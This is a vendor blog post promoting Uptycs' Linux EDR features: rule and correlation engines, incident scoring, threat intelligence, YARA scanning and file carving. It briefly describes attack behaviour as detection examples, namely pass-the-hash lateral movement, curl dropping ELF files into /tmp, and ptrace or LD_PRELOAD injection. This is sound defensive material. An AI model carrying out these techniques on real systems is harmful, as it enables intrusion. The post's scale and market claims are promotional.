Uptycs Blog

Welcome! The Uptycs blog is for security professionals and osquery enthusiasts interested in exploring new ideas in cloud security. We hope you’ll enjoy our blog enough to subscribe and share.

Uptycs EDR for Linux: Detection and visibility all the way through

Despite the fact that Linux server endpoints comprise 90% of cloud workloads and a majority of on-premises enterprise workloads, they don’t usually get as much attention as productivity endpoints. Most EDR solutions focus on end users and don’t meet the unique requirements for production Linux servers, such as the need for 100% uptime and low resource consumption.

Uptycs’ Linux EDR functionality provides a performant solution that’s been deployed on some of the world’s largest Linux server fleets, including a single tenant deployment that exceeds 200,000 servers.

The solution comes pre-configured with hundreds of detection rules mapped to the MITRE ATT&CK matrix (Uptycs is participating in this year’s MITRE ATT&CK evaluation, which is focusing on the activity of FIN7 and Carbanak). The MITRE ATT&CK mapping simplifies incident context for SOC analysts. In addition, the Uptycs threat research team provides daily updates for detection rules and intelligence focused on Linux threats.

In this post I’ll explore Uptycs’ Linux EDR capabilities and look at a handful of specific EDR features within Uptycs that help SOC teams with detection and investigation.

Schedule a demo to learn more about the detection and investigation functionality in Uptycs.

Designed to detect advanced attacks

Uptycs uses a multi-layered detection approach. Uptycs’ EDR functionality not only detects the attack but also prioritizes incidents based on a custom composite score and severity. This reduces alert fatigue and allows analysts to focus on critical incidents first. Uptycs uses two components to achieve this: a rule engine and a correlation engine.

Rule engine

The Uptycs rule engine processes events in real-time and works at significant scale. It applies behavioral rules and intelligence to detect suspicious/malicious events, and uses the MITRE ATT&CK framework to label, classify, and score raw events. Based on rule configuration, the engine can generate alerts or keep a labeled event for additional incident context.

Correlation engine

Upytcs’ advanced correlation engine creates an incident by correlating activity that belongs to an alert. The rule engine invokes the correlation engine when it detects something suspicious. The correlation engine then solves three major problems SOC analysts often encounter: alert grouping, incident prioritization, and correlation of lateral movement.

Alert grouping

All of the alerts that belong to the same incident are grouped together to reduce alert fatigue and provide better context of the incident to the analyst. You can see this in action in figures 1 and 2 (below) where related alerts and events are grouped together as “signals” that comprise a detection.

Incident prioritization

The Uptycs correlation engine uses a score mechanism to prioritize incidents (see figures 1 and 2). This lets SOC analysts focus first on critical incidents that require immediate attention. Incident prioritization reduces the time and energy needed to effectively investigate high-severity incidents.

Alerts and labeled events related to an incident are grouped together as signals within Uptycs’ EDR capabilities.

Figure 1: Alerts and labeled events related to an incident are grouped together as signals within Uptycs’ EDR capabilities. The correlation engine creates a threat score for prioritizing response. The grouping and scoring reduce alert fatigue and give SOC analysts important context for incident investigation.

This process graph related to an incident provides visibility inside an attack.

Figure 2: This process graph related to an incident provides visibility inside an attack. The graph offers insights into process executions, command lines, sockets, files, and user accounts.

Lateral movement correlation

Advanced attacks don't stop at a single machine. Attackers move laterally within an organization’s systems to look for high-value targets. Uptycs' correlation engine can connect this lateral movement as the attack progresses. For example, in figure 3 below, a Python process is executing a script named '/tmp/HJfbsd.py' to authenticate a user with ntlm hash and execute cmd.exe on a Windows machine. SOC analysts can use this information to quickly take action and safeguard the organization’s resources. Lateral movement correlation also provides insight into attacker methodologies and intentions.

Lateral movement correlation within Uptycs’ EDR functionality lets SOC analysts quickly take action to safeguard their organization’s systems and resources.

Figure 3: Lateral movement correlation within Uptycs’ EDR functionality lets SOC analysts quickly take action to safeguard their organization’s systems and resources.

Native integration with threat intelligence

The Uptycs threat research team provides daily intelligence on Linux attacks. A dedicated threat intelligence dashboard offers SOC teams at-a-glance details on the overall daily added and expired threat indicators, the latest malware news, categorization of threat indicators into categories, and alerts (see figure 4, below).

The Uptycs threat intelligence dashboard brings together threat indicators, malware news, alerts, and more.

Figure 4: The Uptycs threat intelligence dashboard brings together threat indicators, malware news, alerts, and more.

Six specific Uptycs EDR features that solve real-life security problems

In addition to the capabilities already outlined, Uptycs offers a number of specific EDR features that can help SOC teams with detection and investigation.

Process code injection and process hollowing detection

Uptycs’ EDR functionality offers native detection for code injection from osquery itself for ptrace syscall and LD_PRELOAD environment variables.

File type identification based on the magic header of the file

The default configuration in Uptycs’ EDR capabilities provides the first 10 bytes of a file in hex string format. This can be used in investigation and threat hunting as well as in detection to identify malware. For example: If the curl utility drops an elf (7f454c46) file in the /tmp directory it becomes a suspicious activity (see figure 5, below).

Detection of an elf executable using the magic header of the file.

Figure 5: Detection of an elf executable using the magic header of the file.

Parent processes history in every event

Every event related to process, file, and socket tables has ancestor_list, which provides the history of all parent processes for that event. This is extremely useful in manual investigations. The context remains with the event for many days, even if the child process is created later. The child process will inherit the ancestor_list of all of its parents.

For example: Let’s say the Python process downloads and runs a remote admin tool and terminates itself. Seven days later the remote admin tool uses the curl utility to download additional tools. The process event of the curl utility will have Python, Python parents, and the remote admin tool in the ancestor list.

YARA memory and file scanning

By default, every process memory is scanned with YARA rules on a periodic basis as defined in the configuration. In addition to auto scan, an on-demand memory scan can also be launched to search for in-memory artifacts across the entire fleet. All of the FIM configurations are scanned during the YARA file scan.

File and memory carving capabilities

The EDR functionality in Uptycs comes with real-time file and memory carving capabilities that can be turned off/on by an administrator for specific users. This carving functionality is very useful for offline analysis of malicious code.

Heavy customization is available

Pretty much everything in Uptycs’ EDR capabilities can be customized, from dashboards to detection rules. Custom detection rules and intelligence can be added into Uptycs with a few simple clicks.

Conclusion

Uptycs’ EDR capabilities provide comprehensive detection for production Linux servers, both on-premises and in the cloud. Combined with Uptycs’ investigation capabilities—including the ability to pivot on data points found in the detection, as well as real-time and historical queries—Uptycs gives SOC teams a robust platform for detection and response.